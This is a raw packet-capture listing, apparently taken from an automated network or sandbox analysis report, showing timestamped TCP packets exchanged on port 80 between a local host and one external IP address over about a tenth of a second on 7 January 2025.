Jan 7, 2025 10:09:04.804809093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.804816961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.804861069 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.804861069 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.837436914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.837493896 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.837527037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.837548018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.837565899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.837578058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.837590933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.837590933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.837605000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.837611914 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.837624073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.837634087 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.837635994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.837667942 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.837667942 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.837676048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.837687969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.837698936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.837713957 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.837743044 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.837752104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.837754965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.837764978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.837776899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.837820053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.837829113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.837838888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.837878942 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.837894917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.837907076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.837917089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.837934971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.837935925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.837950945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.837973118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.837973118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.837996960 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.837996960 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.838036060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.838047028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.838057995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.838107109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.838167906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.838181019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.838193893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.838218927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.838232040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.838236094 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.838243008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.838259935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.838272095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.838278055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.838283062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.838316917 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.838316917 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.838346004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.838357925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.838368893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.838380098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.838382959 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.838382959 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.838392019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.838422060 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.838435888 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.839895964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.839929104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.839940071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.839957952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.839972019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.839982033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.839994907 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840033054 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840033054 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840037107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840049028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840059042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840109110 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840109110 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840137959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840152979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840178967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840190887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840204000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840210915 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840229988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840240955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840253115 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840253115 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840256929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840281010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840290070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840311050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840311050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840326071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840337992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840339899 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840373039 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840401888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840405941 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840414047 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840425968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840451002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840461016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840518951 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840518951 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840668917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840682983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840694904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840706110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840719938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840729952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840744019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840744019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840758085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840770006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840780973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840792894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840796947 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840804100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840816021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840826035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840826035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840827942 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840840101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840852022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840857029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840867043 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840867043 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840894938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840904951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840914965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840926886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840939045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840950966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.840961933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.840961933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.841016054 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.841114044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.841125011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.841135025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.841160059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.841172934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.841182947 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.841183901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.841187000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.841201067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.841211081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.841224909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.841237068 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.841276884 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.841276884 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.868237019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868266106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868275881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868314028 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868329048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868340969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868362904 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.868376017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868388891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.868426085 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.868447065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868458986 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868469954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868483067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868494034 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.868519068 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.868539095 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.868550062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868561029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868571997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868582010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868606091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.868606091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.868654966 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.868655920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868707895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868719101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868765116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868782043 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.868782997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868782043 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.868798971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868812084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868834972 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.868861914 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.868869066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.868921041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.891472101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.891485929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.891498089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.891510963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.891521931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.891552925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.891562939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.891561985 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.891576052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.891588926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.891593933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.891635895 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.924364090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924401045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924417019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924427032 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924442053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924448013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924455881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924484015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924494982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924504995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924516916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924530029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924555063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.924555063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.924555063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.924555063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.924576044 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.924606085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924618006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924637079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924655914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924673080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924683094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924706936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924700975 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.924724102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924741983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924760103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924771070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924797058 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924808979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924809933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.924818993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924809933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.924809933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.924810886 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.924835920 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.924837112 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.924841881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924880981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.924907923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924927950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924947023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924957037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.924958944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924973965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.924978971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.924993038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.925008059 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.925014019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.925025940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.925036907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.925049067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.925050020 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.925059080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.925105095 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.925105095 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.926790953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.926826954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.926846981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.926865101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.926876068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.926888943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.926891088 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.926891088 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.926902056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.926934958 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.926939011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.926949978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.926955938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.926960945 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.926960945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.926987886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.926990986 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927000046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927010059 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927011967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927031040 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927037001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927051067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927062035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927064896 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927076101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927100897 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927131891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927136898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927150011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927179098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927190065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927201033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927212954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927213907 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927231073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927259922 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927400112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927417994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927429914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927455902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927459955 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927469015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927488089 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927493095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927511930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927517891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927517891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927522898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927532911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927537918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927546978 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927561998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927572966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927583933 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927591085 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927591085 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927608967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927620888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927637100 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927637100 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927639961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927658081 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927659988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927673101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927685022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927706003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927714109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927714109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927719116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927730083 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927732944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927755117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927767038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927774906 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:04.927778006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927789927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927799940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:04.927804947 CET	50017	80	192.168.2.4	31.41.244.11
